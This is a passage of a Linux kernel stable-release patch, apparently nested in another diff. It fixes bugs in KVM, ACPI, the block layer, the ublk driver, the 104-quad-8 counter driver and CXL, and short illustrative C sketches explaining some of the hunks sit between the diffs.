++SUBLEVEL = 11
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/kernel/compat_alignment.c b/arch/arm64/kernel/compat_alignment.c
+index 5edec2f49ec98..deff21bfa6800 100644
+--- a/arch/arm64/kernel/compat_alignment.c
++++ b/arch/arm64/kernel/compat_alignment.c
+@@ -314,36 +314,32 @@ int do_compat_alignment_fixup(unsigned long addr, struct pt_regs *regs)
+ 	int (*handler)(unsigned long addr, u32 instr, struct pt_regs *regs);
+ 	unsigned int type;
+ 	u32 instr = 0;
+-	u16 tinstr = 0;
+ 	int isize = 4;
+ 	int thumb2_32b = 0;
+-	int fault;
+ 
+ 	instrptr = instruction_pointer(regs);
+ 
+ 	if (compat_thumb_mode(regs)) {
+ 		__le16 __user *ptr = (__le16 __user *)(instrptr & ~1);
++		u16 tinstr, tinst2;
+ 
+-		fault = alignment_get_thumb(regs, ptr, &tinstr);
+-		if (!fault) {
+-			if (IS_T32(tinstr)) {
+-				/* Thumb-2 32-bit */
+-				u16 tinst2;
+-				fault = alignment_get_thumb(regs, ptr + 1, &tinst2);
+-				instr = ((u32)tinstr << 16) | tinst2;
+-				thumb2_32b = 1;
+-			} else {
+-				isize = 2;
+-				instr = thumb2arm(tinstr);
+-			}
++		if (alignment_get_thumb(regs, ptr, &tinstr))
++			return 1;
++
++		if (IS_T32(tinstr)) { /* Thumb-2 32-bit */
++			if (alignment_get_thumb(regs, ptr + 1, &tinst2))
++				return 1;
++			instr = ((u32)tinstr << 16) | tinst2;
++			thumb2_32b = 1;
++		} else {
++			isize = 2;
++			instr = thumb2arm(tinstr);
+ 		}
+ 	} else {
+-		fault = alignment_get_arm(regs, (__le32 __user *)instrptr, &instr);
++		if (alignment_get_arm(regs, (__le32 __user *)instrptr, &instr))
++			return 1;
+ 	}
+ 
+-	if (fault)
+-		return 1;
+-
+ 	switch (CODING_BITS(instr)) {
+ 	case 0x00000000:	/* 3.13.4 load/store instruction extensions */
+ 		if (LDSTHD_I_BIT(instr))
+diff --git a/arch/s390/kvm/intercept.c b/arch/s390/kvm/intercept.c
+index 0ee02dae14b2b..2cda8d9d7c6ef 100644
+--- a/arch/s390/kvm/intercept.c
++++ b/arch/s390/kvm/intercept.c
+@@ -271,10 +271,18 @@ static int handle_prog(struct kvm_vcpu *vcpu)
+  * handle_external_interrupt - used for external interruption interceptions
+  * @vcpu: virtual cpu
+  *
+- * This interception only occurs if the CPUSTAT_EXT_INT bit was set, or if
+- * the new PSW does not have external interrupts disabled. In the first case,
+- * we've got to deliver the interrupt manually, and in the second case, we
+- * drop to userspace to handle the situation there.
++ * This interception occurs if:
++ * - the CPUSTAT_EXT_INT bit was already set when the external interrupt
++ *   occurred. In this case, the interrupt needs to be injected manually to
++ *   preserve interrupt priority.
++ * - the external new PSW has external interrupts enabled, which will cause an
++ *   interruption loop. We drop to userspace in this case.
++ *
++ * The latter case can be detected by inspecting the external mask bit in the
++ * external new psw.
++ *
++ * Under PV, only the latter case can occur, since interrupt priorities are
++ * handled in the ultravisor.
+  */
+ static int handle_external_interrupt(struct kvm_vcpu *vcpu)
+ {
+@@ -285,10 +293,18 @@ static int handle_external_interrupt(struct kvm_vcpu *vcpu)
+ 
+ 	vcpu->stat.exit_external_interrupt++;
+ 
+-	rc = read_guest_lc(vcpu, __LC_EXT_NEW_PSW, &newpsw, sizeof(psw_t));
+-	if (rc)
+-		return rc;
+-	/* We can not handle clock comparator or timer interrupt with bad PSW */
++	if (kvm_s390_pv_cpu_is_protected(vcpu)) {
++		newpsw = vcpu->arch.sie_block->gpsw;
++	} else {
++		rc = read_guest_lc(vcpu, __LC_EXT_NEW_PSW, &newpsw, sizeof(psw_t));
++		if (rc)
++			return rc;
++	}
++
++	/*
++	 * Clock comparator or timer interrupt with external interrupt enabled
++	 * will cause interrupt loop. Drop to userspace.
++	 */
+ 	if ((eic == EXT_IRQ_CLK_COMP || eic == EXT_IRQ_CPU_TIMER) &&
+ 	    (newpsw.mask & PSW_MASK_EXT))
+ 		return -EOPNOTSUPP;
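
The comment in the hunk above describes when the intercept must be punted to userspace. A standalone sketch of that decision, with the constants and PSW layout as illustrative stand-ins for the real s390 definitions:

#include <stdbool.h>
#include <stdint.h>

#define PSW_MASK_EXT      0x0100000000000000ULL /* assumed bit position */
#define EXT_IRQ_CLK_COMP  0x1004
#define EXT_IRQ_CPU_TIMER 0x1005

struct psw { uint64_t mask; uint64_t addr; };

/* If the external new PSW keeps external interrupts enabled, delivering a
 * clock-comparator or CPU-timer interrupt would re-trigger immediately,
 * an interruption loop the hypervisor cannot break: drop to userspace. */
static bool would_loop(uint16_t eic, const struct psw *newpsw)
{
	return (eic == EXT_IRQ_CLK_COMP || eic == EXT_IRQ_CPU_TIMER) &&
	       (newpsw->mask & PSW_MASK_EXT);
}
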
+diff --git a/arch/x86/kernel/acpi/boot.c b/arch/x86/kernel/acpi/boot.c
+index 518bda50068cb..0f762070a5e10 100644
+--- a/arch/x86/kernel/acpi/boot.c
++++ b/arch/x86/kernel/acpi/boot.c
+@@ -146,7 +146,11 @@ static int __init acpi_parse_madt(struct acpi_table_header *table)
+ 
+ 		pr_debug("Local APIC address 0x%08x\n", madt->address);
+ 	}
+-	if (madt->header.revision >= 5)
++
++	/* ACPI 6.3 and newer support the online capable bit. */
++	if (acpi_gbl_FADT.header.revision > 6 ||
++	    (acpi_gbl_FADT.header.revision == 6 &&
++	     acpi_gbl_FADT.minor_revision >= 3))
+ 		acpi_support_online_capable = true;
+ 
+ 	default_acpi_madt_oem_check(madt->header.oem_id,
+@@ -193,7 +197,8 @@ static bool __init acpi_is_processor_usable(u32 lapic_flags)
+ 	if (lapic_flags & ACPI_MADT_ENABLED)
+ 		return true;
+ 
+-	if (acpi_support_online_capable && (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++	if (!acpi_support_online_capable ||
++	    (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
+ 		return true;
+ 
+ 	return false;
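
The fix above keys the check off the FADT spec revision rather than the MADT's own revision. A minimal sketch of the version test, with a stand-in struct for acpi_gbl_FADT:

#include <stdbool.h>
#include <stdint.h>

struct fadt_id { uint8_t revision; uint8_t minor_revision; };

static bool supports_online_capable(const struct fadt_id *f)
{
	/* The online-capable MADT flag is defined from ACPI 6.3 onward. */
	return f->revision > 6 ||
	       (f->revision == 6 && f->minor_revision >= 3);
}
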
+diff --git a/arch/x86/kvm/kvm_onhyperv.h b/arch/x86/kvm/kvm_onhyperv.h
+index 287e98ef9df3d..6272dabec02da 100644
+--- a/arch/x86/kvm/kvm_onhyperv.h
++++ b/arch/x86/kvm/kvm_onhyperv.h
+@@ -12,6 +12,11 @@ int hv_remote_flush_tlb_with_range(struct kvm *kvm,
+ int hv_remote_flush_tlb(struct kvm *kvm);
+ void hv_track_root_tdp(struct kvm_vcpu *vcpu, hpa_t root_tdp);
+ #else /* !CONFIG_HYPERV */
++static inline int hv_remote_flush_tlb(struct kvm *kvm)
++{
++	return -EOPNOTSUPP;
++}
++
+ static inline void hv_track_root_tdp(struct kvm_vcpu *vcpu, hpa_t root_tdp)
+ {
+ }
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index f03bdaf79c886..a682ca4c9fe11 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -3718,7 +3718,7 @@ static void svm_enable_nmi_window(struct kvm_vcpu *vcpu)
+ 	svm->vmcb->save.rflags |= (X86_EFLAGS_TF | X86_EFLAGS_RF);
+ }
+ 
+-static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
++static void svm_flush_tlb_asid(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+ 
+@@ -3742,6 +3742,37 @@ static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
+ 		svm->current_vmcb->asid_generation--;
+ }
+ 
++static void svm_flush_tlb_current(struct kvm_vcpu *vcpu)
++{
++	hpa_t root_tdp = vcpu->arch.mmu->root.hpa;
++
++	/*
++	 * When running on Hyper-V with EnlightenedNptTlb enabled, explicitly
++	 * flush the NPT mappings via hypercall as flushing the ASID only
++	 * affects virtual to physical mappings, it does not invalidate guest
++	 * physical to host physical mappings.
++	 */
++	if (svm_hv_is_enlightened_tlb_enabled(vcpu) && VALID_PAGE(root_tdp))
++		hyperv_flush_guest_mapping(root_tdp);
++
++	svm_flush_tlb_asid(vcpu);
++}
++
++static void svm_flush_tlb_all(struct kvm_vcpu *vcpu)
++{
++	/*
++	 * When running on Hyper-V with EnlightenedNptTlb enabled, remote TLB
++	 * flushes should be routed to hv_remote_flush_tlb() without requesting
++	 * a "regular" remote flush.  Reaching this point means either there's
++	 * a KVM bug or a prior hv_remote_flush_tlb() call failed, both of
++	 * which might be fatal to the guest.  Yell, but try to recover.
++	 */
++	if (WARN_ON_ONCE(svm_hv_is_enlightened_tlb_enabled(vcpu)))
++		hv_remote_flush_tlb(vcpu->kvm);
++
++	svm_flush_tlb_asid(vcpu);
++}
++
+ static void svm_flush_tlb_gva(struct kvm_vcpu *vcpu, gva_t gva)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+@@ -4747,10 +4778,10 @@ static struct kvm_x86_ops svm_x86_ops __initdata = {
+ 	.set_rflags = svm_set_rflags,
+ 	.get_if_flag = svm_get_if_flag,
+ 
+-	.flush_tlb_all = svm_flush_tlb_current,
++	.flush_tlb_all = svm_flush_tlb_all,
+ 	.flush_tlb_current = svm_flush_tlb_current,
+ 	.flush_tlb_gva = svm_flush_tlb_gva,
+-	.flush_tlb_guest = svm_flush_tlb_current,
++	.flush_tlb_guest = svm_flush_tlb_asid,
+ 
+ 	.vcpu_pre_run = svm_vcpu_pre_run,
+ 	.vcpu_run = svm_vcpu_run,
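
The net effect of the svm.c hunk is that the three flush hooks no longer share one implementation. A hedged, self-contained sketch of the resulting split (types and bodies are illustrative stubs, not KVM code):

#include <stdbool.h>
#include <stdio.h>

struct vcpu { bool enlightened_npt; };

static void flush_asid(struct vcpu *v)
{
	(void)v;
	puts("assign new ASID (flushes guest-virtual mappings)");
}

static void flush_current(struct vcpu *v)
{
	if (v->enlightened_npt)
		puts("hypercall: flush GPA->HPA mappings for this root");
	flush_asid(v);
}

static void flush_all(struct vcpu *v)
{
	if (v->enlightened_npt)
		puts("WARN: should have used the remote-flush hook; recover");
	flush_asid(v);
}

struct flush_ops {
	void (*flush_tlb_all)(struct vcpu *);
	void (*flush_tlb_current)(struct vcpu *);
	void (*flush_tlb_guest)(struct vcpu *);
};

static const struct flush_ops ops = {
	.flush_tlb_all     = flush_all,
	.flush_tlb_current = flush_current,
	.flush_tlb_guest   = flush_asid, /* ASID flush alone suffices here */
};

int main(void)
{
	struct vcpu v = { .enlightened_npt = true };

	ops.flush_tlb_current(&v);
	return 0;
}
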
+diff --git a/arch/x86/kvm/svm/svm_onhyperv.h b/arch/x86/kvm/svm/svm_onhyperv.h
+index 65c355b4b8bf0..345b87acf9b04 100644
+--- a/arch/x86/kvm/svm/svm_onhyperv.h
++++ b/arch/x86/kvm/svm/svm_onhyperv.h
+@@ -6,6 +6,8 @@
+ #ifndef __ARCH_X86_KVM_SVM_ONHYPERV_H__
+ #define __ARCH_X86_KVM_SVM_ONHYPERV_H__
+ 
++#include <asm/mshyperv.h>
++
+ #if IS_ENABLED(CONFIG_HYPERV)
+ 
+ #include "kvm_onhyperv.h"
+@@ -15,6 +17,14 @@ static struct kvm_x86_ops svm_x86_ops;
+ 
+ int svm_hv_enable_l2_tlb_flush(struct kvm_vcpu *vcpu);
+ 
++static inline bool svm_hv_is_enlightened_tlb_enabled(struct kvm_vcpu *vcpu)
++{
++	struct hv_vmcb_enlightenments *hve = &to_svm(vcpu)->vmcb->control.hv_enlightenments;
++
++	return ms_hyperv.nested_features & HV_X64_NESTED_ENLIGHTENED_TLB &&
++	       !!hve->hv_enlightenments_control.enlightened_npt_tlb;
++}
++
+ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+ 	struct hv_vmcb_enlightenments *hve = &vmcb->control.hv_enlightenments;
+@@ -80,6 +90,11 @@ static inline void svm_hv_update_vp_id(struct vmcb *vmcb, struct kvm_vcpu *vcpu)
+ }
+ #else
+ 
++static inline bool svm_hv_is_enlightened_tlb_enabled(struct kvm_vcpu *vcpu)
++{
++	return false;
++}
++
+ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+ }
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index bceb5ad409c63..b7f2e59d50ee4 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -3873,7 +3873,12 @@ static void nested_vmx_inject_exception_vmexit(struct kvm_vcpu *vcpu)
+ 		exit_qual = 0;
+ 	}
+ 
+-	if (ex->has_error_code) {
++	/*
++	 * Unlike AMD's Paged Real Mode, which reports an error code on #PF
++	 * VM-Exits even if the CPU is in Real Mode, Intel VMX never sets the
++	 * "has error code" flags on VM-Exit if the CPU is in Real Mode.
++	 */
++	if (ex->has_error_code && is_protmode(vcpu)) {
+ 		/*
+ 		 * Intel CPUs do not generate error codes with bits 31:16 set,
+ 		 * and more importantly VMX disallows setting bits 31:16 in the
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 0ec7a0cb5da81..2d76c254582b0 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -9795,13 +9795,20 @@ int kvm_check_nested_events(struct kvm_vcpu *vcpu)
+ 
+ static void kvm_inject_exception(struct kvm_vcpu *vcpu)
+ {
++	/*
++	 * Suppress the error code if the vCPU is in Real Mode, as Real Mode
++	 * exceptions don't report error codes.  The presence of an error code
++	 * is carried with the exception and only stripped when the exception
++	 * is injected as intercepted #PF VM-Exits for AMD's Paged Real Mode do
++	 * report an error code despite the CPU being in Real Mode.
++	 */
++	vcpu->arch.exception.has_error_code &= is_protmode(vcpu);
++
+ 	trace_kvm_inj_exception(vcpu->arch.exception.vector,
+ 				vcpu->arch.exception.has_error_code,
+ 				vcpu->arch.exception.error_code,
+ 				vcpu->arch.exception.injected);
+ 
+-	if (vcpu->arch.exception.error_code && !is_protmode(vcpu))
+-		vcpu->arch.exception.error_code = false;
+ 	static_call(kvm_x86_inject_exception)(vcpu);
+ }
+ 
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index c021fb05161b9..86425167594cf 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -1359,8 +1359,6 @@ bool blk_rq_is_poll(struct request *rq)
+ 		return false;
+ 	if (rq->mq_hctx->type != HCTX_TYPE_POLL)
+ 		return false;
+-	if (WARN_ON_ONCE(!rq->bio))
+-		return false;
+ 	return true;
+ }
+ EXPORT_SYMBOL_GPL(blk_rq_is_poll);
+@@ -1368,7 +1366,7 @@ EXPORT_SYMBOL_GPL(blk_rq_is_poll);
+ static void blk_rq_poll_completion(struct request *rq, struct completion *wait)
+ {
+ 	do {
+-		bio_poll(rq->bio, NULL, 0);
++		blk_mq_poll(rq->q, blk_rq_to_qc(rq), NULL, 0);
+ 		cond_resched();
+ 	} while (!completion_done(wait));
+ }
+diff --git a/block/genhd.c b/block/genhd.c
+index 9c4c9aa559ab8..7082032636035 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -368,7 +368,6 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ 	if (disk->open_partitions)
+ 		return -EBUSY;
+ 
+-	set_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	/*
+ 	 * If the device is opened exclusively by current thread already, it's
+ 	 * safe to scan partitons, otherwise, use bd_prepare_to_claim() to
+@@ -381,12 +380,19 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ 			return ret;
+ 	}
+ 
++	set_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	bdev = blkdev_get_by_dev(disk_devt(disk), mode & ~FMODE_EXCL, NULL);
+ 	if (IS_ERR(bdev))
+ 		ret =  PTR_ERR(bdev);
+ 	else
+ 		blkdev_put(bdev, mode & ~FMODE_EXCL);
+ 
++	/*
++	 * If blkdev_get_by_dev() failed early, GD_NEED_PART_SCAN is still set,
++	 * and re-assembling a partitioned raid device would then wrongly
++	 * create partitions for the underlying disk.
++	 */
++	clear_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	if (!(mode & FMODE_EXCL))
+ 		bd_abort_claiming(disk->part0, disk_scan_partitions);
+ 	return ret;
+diff --git a/drivers/acpi/acpi_video.c b/drivers/acpi/acpi_video.c
+index 97b711e57bff4..c7a6d0b69dabd 100644
+--- a/drivers/acpi/acpi_video.c
++++ b/drivers/acpi/acpi_video.c
+@@ -1984,6 +1984,7 @@ static int instance;
+ static int acpi_video_bus_add(struct acpi_device *device)
+ {
+ 	struct acpi_video_bus *video;
++	bool auto_detect;
+ 	int error;
+ 	acpi_status status;
+ 
+@@ -2045,10 +2046,20 @@ static int acpi_video_bus_add(struct acpi_device *device)
+ 	mutex_unlock(&video_list_lock);
+ 
+ 	/*
+-	 * The userspace visible backlight_device gets registered separately
+-	 * from acpi_video_register_backlight().
++	 * If backlight-type auto-detection is used then a native backlight may
++	 * show up later and this may change the result from video to native.
++	 * Therefore the userspace-visible /sys/class/backlight device normally
++	 * gets registered separately by the GPU driver calling
++	 * acpi_video_register_backlight() when an internal panel is detected.
++	 * Register the backlight now when not using auto-detection, so that
++	 * when the kernel cmdline or DMI-quirks are used the backlight will
++	 * get registered even if acpi_video_register_backlight() is not called.
+ 	 */
+ 	acpi_video_run_bcl_for_osi(video);
++	if (__acpi_video_get_backlight_type(false, &auto_detect) == acpi_backlight_video &&
++	    !auto_detect)
++		acpi_video_bus_register_backlight(video);
++
+ 	acpi_video_bus_add_notify_handler(video);
+ 
+ 	return 0;
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 14d6d81e536fe..b3b0b06971df5 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -276,6 +276,43 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		},
+ 	},
+ 
++	/*
++	 * Models which need acpi_video backlight control where the GPU drivers
++	 * do not call acpi_video_register_backlight() because no internal panel
++	 * is detected. Typically these are all-in-ones (monitors with builtin
++	 * PC) where the panel connection shows up as regular DP instead of eDP.
++	 */
++	{
++	 .callback = video_detect_force_video,
++	 /* Apple iMac14,1 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Apple Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "iMac14,1"),
++		},
++	},
++	{
++	 .callback = video_detect_force_video,
++	 /* Apple iMac14,2 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Apple Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "iMac14,2"),
++		},
++	},
++
++	/*
++	 * Older models with nvidia GPU which need acpi_video backlight
++	 * control and where the old nvidia binary driver series does not
++	 * call acpi_video_register_backlight().
++	 */
++	{
++	 .callback = video_detect_force_video,
++	 /* ThinkPad W530 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad W530"),
++		},
++	},
++
+ 	/*
+ 	 * These models have a working acpi_video backlight control, and using
+ 	 * native backlight causes a regression where backlight does not work
+@@ -774,7 +811,7 @@ static bool prefer_native_over_acpi_video(void)
+  * Determine which type of backlight interface to use on this system,
+  * First check cmdline, then dmi quirks, then do autodetect.
+  */
+-static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
++enum acpi_backlight_type __acpi_video_get_backlight_type(bool native, bool *auto_detect)
+ {
+ 	static DEFINE_MUTEX(init_mutex);
+ 	static bool nvidia_wmi_ec_present;
+@@ -799,6 +836,9 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 		native_available = true;
+ 	mutex_unlock(&init_mutex);
+ 
++	if (auto_detect)
++		*auto_detect = false;
++
+ 	/*
+ 	 * The below heuristics / detection steps are in order of descending
+ 	 * precedence. The commandline takes precedence over anything else.
+@@ -810,6 +850,9 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	if (acpi_backlight_dmi != acpi_backlight_undef)
+ 		return acpi_backlight_dmi;
+ 
++	if (auto_detect)
++		*auto_detect = true;
++
+ 	/* Special cases such as nvidia_wmi_ec and apple gmux. */
+ 	if (nvidia_wmi_ec_present)
+ 		return acpi_backlight_nvidia_wmi_ec;
+@@ -829,15 +872,4 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	/* No ACPI video/native (old hw), use vendor specific fw methods. */
+ 	return acpi_backlight_vendor;
+ }
+-
+-enum acpi_backlight_type acpi_video_get_backlight_type(void)
+-{
+-	return __acpi_video_get_backlight_type(false);
+-}
+-EXPORT_SYMBOL(acpi_video_get_backlight_type);
+-
+-bool acpi_video_backlight_use_native(void)
+-{
+-	return __acpi_video_get_backlight_type(true) == acpi_backlight_native;
+-}
+-EXPORT_SYMBOL(acpi_video_backlight_use_native);
++EXPORT_SYMBOL(__acpi_video_get_backlight_type);
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 22a790d512842..2ed994a313a91 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -233,7 +233,7 @@ static int ublk_validate_params(const struct ublk_device *ub)
+ 	if (ub->params.types & UBLK_PARAM_TYPE_BASIC) {
+ 		const struct ublk_param_basic *p = &ub->params.basic;
+ 
+-		if (p->logical_bs_shift > PAGE_SHIFT)
++		if (p->logical_bs_shift > PAGE_SHIFT || p->logical_bs_shift < 9)
+ 			return -EINVAL;
+ 
+ 		if (p->logical_bs_shift > p->physical_bs_shift)
+@@ -1202,9 +1202,10 @@ static void ublk_handle_need_get_data(struct ublk_device *ub, int q_id,
+ 	ublk_queue_cmd(ubq, req);
+ }
+ 
+-static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
++static int __ublk_ch_uring_cmd(struct io_uring_cmd *cmd,
++			       unsigned int issue_flags,
++			       struct ublksrv_io_cmd *ub_cmd)
+ {
+-	struct ublksrv_io_cmd *ub_cmd = (struct ublksrv_io_cmd *)cmd->cmd;
+ 	struct ublk_device *ub = cmd->file->private_data;
+ 	struct ublk_queue *ubq;
+ 	struct ublk_io *io;
+@@ -1306,6 +1307,23 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	return -EIOCBQUEUED;
+ }
+ 
++static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
++{
++	struct ublksrv_io_cmd *ub_src = (struct ublksrv_io_cmd *) cmd->cmd;
++	struct ublksrv_io_cmd ub_cmd;
++
++	/*
++	 * Not necessary for async retry, but let's keep it simple and always
++	 * copy the values to avoid any potential reuse.
++	 */
++	ub_cmd.q_id = READ_ONCE(ub_src->q_id);
++	ub_cmd.tag = READ_ONCE(ub_src->tag);
++	ub_cmd.result = READ_ONCE(ub_src->result);
++	ub_cmd.addr = READ_ONCE(ub_src->addr);
++
++	return __ublk_ch_uring_cmd(cmd, issue_flags, &ub_cmd);
++}
++
+ static const struct file_operations ublk_ch_fops = {
+ 	.owner = THIS_MODULE,
+ 	.open = ublk_ch_open,
+@@ -1886,6 +1904,8 @@ static int ublk_ctrl_set_params(struct io_uring_cmd *cmd)
+ 		/* clear all we don't support yet */
+ 		ub->params.types &= UBLK_PARAM_TYPE_ALL;
+ 		ret = ublk_validate_params(ub);
++		if (ret)
++			ub->params.types = 0;
+ 	}
+ 	mutex_unlock(&ub->mutex);
+ 	ublk_put_device(ub);
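
The ublk fix snapshots the userspace-shared command into a private copy before any validation, so a concurrent rewrite cannot change a field between check and use. A standalone sketch of the pattern (the struct layout and READ_ONCE macro are simplified stand-ins for the kernel's):

#include <stdint.h>

#define READ_ONCE(x) (*(volatile __typeof__(x) *)&(x))

struct io_cmd { uint16_t q_id; uint16_t tag; int32_t result; uint64_t addr; };

static void snapshot_cmd(struct io_cmd *shared, struct io_cmd *priv)
{
	/* One read per field; later validation acts on *priv only. */
	priv->q_id   = READ_ONCE(shared->q_id);
	priv->tag    = READ_ONCE(shared->tag);
	priv->result = READ_ONCE(shared->result);
	priv->addr   = READ_ONCE(shared->addr);
}
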
+diff --git a/drivers/counter/104-quad-8.c b/drivers/counter/104-quad-8.c
+index deed4afadb298..d9cb937665cfc 100644
+--- a/drivers/counter/104-quad-8.c
++++ b/drivers/counter/104-quad-8.c
+@@ -97,10 +97,6 @@ struct quad8 {
+ 	struct quad8_reg __iomem *reg;
+ };
+ 
+-/* Borrow Toggle flip-flop */
+-#define QUAD8_FLAG_BT BIT(0)
+-/* Carry Toggle flip-flop */
+-#define QUAD8_FLAG_CT BIT(1)
+ /* Error flag */
+ #define QUAD8_FLAG_E BIT(4)
+ /* Up/Down flag */
+@@ -133,6 +129,9 @@ struct quad8 {
+ #define QUAD8_CMR_QUADRATURE_X2 0x10
+ #define QUAD8_CMR_QUADRATURE_X4 0x18
+ 
++/* Each Counter is 24 bits wide */
++#define LS7267_CNTR_MAX GENMASK(23, 0)
++
+ static int quad8_signal_read(struct counter_device *counter,
+ 			     struct counter_signal *signal,
+ 			     enum counter_signal_level *level)
+@@ -156,18 +155,10 @@ static int quad8_count_read(struct counter_device *counter,
+ {
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	struct channel_reg __iomem *const chan = priv->reg->channel + count->id;
+-	unsigned int flags;
+-	unsigned int borrow;
+-	unsigned int carry;
+ 	unsigned long irqflags;
+ 	int i;
+ 
+-	flags = ioread8(&chan->control);
+-	borrow = flags & QUAD8_FLAG_BT;
+-	carry = !!(flags & QUAD8_FLAG_CT);
+-
+-	/* Borrow XOR Carry effectively doubles count range */
+-	*val = (unsigned long)(borrow ^ carry) << 24;
++	*val = 0;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+ 
+@@ -191,8 +182,7 @@ static int quad8_count_write(struct counter_device *counter,
+ 	unsigned long irqflags;
+ 	int i;
+ 
+-	/* Only 24-bit values are supported */
+-	if (val > 0xFFFFFF)
++	if (val > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+@@ -378,7 +368,7 @@ static int quad8_action_read(struct counter_device *counter,
+ 
+ 	/* Handle Index signals */
+ 	if (synapse->signal->id >= 16) {
+-		if (priv->preset_enable[count->id])
++		if (!priv->preset_enable[count->id])
+ 			*action = COUNTER_SYNAPSE_ACTION_RISING_EDGE;
+ 		else
+ 			*action = COUNTER_SYNAPSE_ACTION_NONE;
+@@ -806,8 +796,7 @@ static int quad8_count_preset_write(struct counter_device *counter,
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	unsigned long irqflags;
+ 
+-	/* Only 24-bit values are supported */
+-	if (preset > 0xFFFFFF)
++	if (preset > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+@@ -834,8 +823,7 @@ static int quad8_count_ceiling_read(struct counter_device *counter,
+ 		*ceiling = priv->preset[count->id];
+ 		break;
+ 	default:
+-		/* By default 0x1FFFFFF (25 bits unsigned) is maximum count */
+-		*ceiling = 0x1FFFFFF;
++		*ceiling = LS7267_CNTR_MAX;
+ 		break;
+ 	}
+ 
+@@ -850,8 +838,7 @@ static int quad8_count_ceiling_write(struct counter_device *counter,
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	unsigned long irqflags;
+ 
+-	/* Only 24-bit values are supported */
+-	if (ceiling > 0xFFFFFF)
++	if (ceiling > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
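
The driver-wide change above replaces scattered 0xFFFFFF literals with one named 24-bit mask. A compilable sketch of that bound check, with GENMASK redefined locally:

#include <stdint.h>

#define GENMASK(h, l) (((~0ULL) << (l)) & (~0ULL >> (63 - (h))))
#define LS7267_CNTR_MAX GENMASK(23, 0) /* 0xFFFFFF: the counters are 24-bit */

static int check_count(uint64_t val)
{
	return val > LS7267_CNTR_MAX ? -34 /* -ERANGE */ : 0;
}
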
+diff --git a/drivers/cxl/core/pci.c b/drivers/cxl/core/pci.c
+index 57764e9cd19d2..76596cd186214 100644
+--- a/drivers/cxl/core/pci.c
++++ b/drivers/cxl/core/pci.c
+@@ -480,7 +480,7 @@ static struct pci_doe_mb *find_cdat_doe(struct device *uport)
+ 	return NULL;
+ }
+ 
+-#define CDAT_DOE_REQ(entry_handle)					\
++#define CDAT_DOE_REQ(entry_handle) cpu_to_le32				\
+ 	(FIELD_PREP(CXL_DOE_TABLE_ACCESS_REQ_CODE,			\
+ 		    CXL_DOE_TABLE_ACCESS_REQ_CODE_READ) |		\
+ 	 FIELD_PREP(CXL_DOE_TABLE_ACCESS_TABLE_TYPE,			\
+@@ -493,8 +493,8 @@ static void cxl_doe_task_complete(struct pci_doe_task *task)
+ }
+ 
+ struct cdat_doe_task {
+-	u32 request_pl;
+-	u32 response_pl[32];
++	__le32 request_pl;
++	__le32 response_pl[32];
+ 	struct completion c;
+ 	struct pci_doe_task task;
+ };
+@@ -528,10 +528,10 @@ static int cxl_cdat_get_length(struct device *dev,
+ 		return rc;
+ 	}
+ 	wait_for_completion(&t.c);
+-	if (t.task.rv < sizeof(u32))
++	if (t.task.rv < 2 * sizeof(__le32))
+ 		return -EIO;
+ 
+-	*length = t.response_pl[1];
++	*length = le32_to_cpu(t.response_pl[1]);
